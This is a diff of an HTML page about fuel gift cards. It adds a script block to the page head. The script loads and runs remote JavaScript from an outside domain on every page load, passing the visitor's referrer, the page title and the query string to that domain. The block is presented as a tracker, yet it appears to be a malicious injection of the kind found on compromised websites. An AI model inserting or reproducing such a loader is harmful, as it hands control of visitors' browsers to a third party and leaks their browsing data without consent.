--- a/index.html
+++ b/index.html
@@ -1,6 +1,16 @@
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
+<span id="76d53425-cd33-1dbc-684e-21da19ff17b8"></span><script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='https://lukoil-sale.club/N9VVzx?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5f8eb53b43baa=script5f8eb53b43bab&_cid=76d53425-cd33-1dbc-684e-21da19ff17b8'; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+if (document.location.protocol === 'https:' && 'https://lukoil-sale.club/N9VVzx?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5f8eb53b43baa=script5f8eb53b43bab'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+</script>
 <meta name="keywords" content="Подарочные карты на бензин ведущих АЗС: кто может приобрести и как использовать, как выбрать" />
 <meta name="description" content="Подарочные карты на бензин ведущих АЗС: кто может приобрести и как использовать, как выбрать" />
 <meta http-equiv="content-type" content="text/html; charset=utf-8" />
